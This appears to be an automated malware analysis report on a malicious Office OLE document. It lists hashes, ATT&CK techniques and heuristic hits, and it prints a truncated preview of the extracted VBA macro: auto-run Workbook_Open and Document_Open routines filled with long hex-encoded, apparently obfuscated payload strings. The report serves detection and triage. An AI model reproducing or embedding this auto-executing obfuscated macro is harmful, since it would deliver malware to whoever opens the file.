Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 859c94956c13f410…

MALICIOUS

Office (OLE)

54.5 KB Created: 2018-03-01 09:30:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: f771a1f50cc9abd4c4054da2861baaa2 SHA-1: dede9c1a54380c540869cab904c9fe7de7bb3521 SHA-256: 859c94956c13f4105e635ec4e2c61508c7566c915cd5cc4f9efc72de1a12670f
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting the execution of external commands or payloads. The presence of a 'macros.bas' file further supports this, likely containing obfuscated code intended to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13829 bytes
SHA-256: 02ed1d7075afd868a93b90104734a51a408722dd77edc15d8f44d4bd50dff081
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 48 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
Dim IMZ_F As String
IMZ_F = "4343432243293043434343431B2B4376434360430D4343434350436262292A432E684343431C5543431D744331264A274343304317404343434342434343424343436C43434343432D43415C43430A7543434343434343101A43431D43434343507F4343430E430B6517434383"
Dim A_XA As String
A_XA = "1C4343234343434F43434343434343561866435F4677434363804343370A43435C42434359424352B71A504343354343435F434343176C1D43414380434312436343438043280511834343432D814E431F434343441D2F434382044343430B7B414343432E47433B4343435743"
Dim HG_N As String
HG_N = "83434343434308437D4B4A70104344274F3F43432C603043434343437743435D434341434536112707436E3E322243431743782A4343264343433A432F434343464373431C31794343437B434373574F63431F363F2F1F538262433D43064343514343062135434B434343430D"
Dim W_R As String
W_R = "0555434325435D1B6A246843593F43437D784355313265435835434A8010144343430665434357434343437A0D5A43436D38484343433E0943434343494343B01B4343346543430E4F43434343624A4380435B3E434327432F43432843317C43436B434343434333430E222743"
Dim BWL_GYX As String
BWL_GYX = "0D6C3D4343348243734343117F6239302A4B434248437843435E43432C434343432547434343434325547E43771B43430743434328436D437F434366431A49114340434343482743433155464305284317161D3F43533F43455133436567606943654380433B0F434343434043"
Dim KQM_A As String
KQM_A = "3D434341060636435643434F434C41196836434343454343430B7C43705A43270C43694362642D753B2522344343432F62666F43434F43430B2B2F7F43434E514343434343433A437D4363267B43433D431143433943435A3D4343435243432E4315434C432F4327434368200D"
Dim RHI_XTH As String
RHI_XTH = "3E432A435A434F43434343804343434315524343402B143C43434367434D7D435143106C6F43802C4343430F561232204314431A4339434381434743434332415B2A3343431E4343436F4348430943774343437C73674B1B05454381494340434350432F433483434355482044"
Dim JD_OR As String
JD_OR = "43317B0B43433F27434343431B435E320A474333437F545543436C35414322232F434D18777979430443178243514338285B431264434641432A513F430D43434344434A43434343332D6B4370433810436C144342430F3C512C3D6F43434F43434343434379431D430E434371"
Dim P_BS As String
P_BS = "5C430464431978434312716C43833C3F1F0643434B43324D78434C437F3931434B43174343433343294343433343434343430B43112943434343434335764325436F42523443437143621E43295643437F29433D43722E3A43640D35436A437C6D434943433825634343744305"
Dim AYM_H As String
AYM_H = "437E4343434343432543181B34774380437773434346431243434343434343433E18733743434343357B5C435F43435A0543436B43444309434D11365C5E8236433B4543073F1B43433E434343334E434352434381524343436E6C4478433943432908284347564343437A4343"
Dim G_I As String
G_I = "7043431A3C0D4343725E4A2443434343094343762E2A58434343436A6A4343434344615A2F371B7443435F264343104343751052437443434312432B430B430B814309433043437E430643604343454343087443365808606B434321434343584322437A436043434343438043"
Dim G_KH As String
G_KH = "43637E434343432D43433243004343500A4343432715393D186043431143434343544379044343837F43474C3E43433443434326434343498043433743432C4643436F2D254F13432977434343437F430B60664343434331344377375043431F09824374731263434943431143"
Dim JF_DEY As String
JF_DEY = "5B810B252F432B81510E4343434379804343434315435206436A435E430970162543434377437721432D432843722473434F1443432943435A432D431C43336E434343183410436828356E4343752F3D6D0C25064343430A1E21564343084343617005430F4243694371434343"
Dim ON_E As String
ON_E = "4316436B4343126C2D481B12194343563143CE277443322E1A435A24434330695B44436E58204343474343432C0743431F432A1B2F43437C3D434357160C5A2543575E43437B43434334061643095F43193E43431135437D43433E6A71207C708375374343434343430D43436D43074354437A4351430B4343434351431843436E1D43"

    Document_Open
End Sub
Public Sub Document_Open()
Dim WF_N As String
WF_N = "734379434343430B43072243434D4337432143642552432143787A43431F4343180A432543764343433B5D4343484350533342514325435C2F33385E244343374346131
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.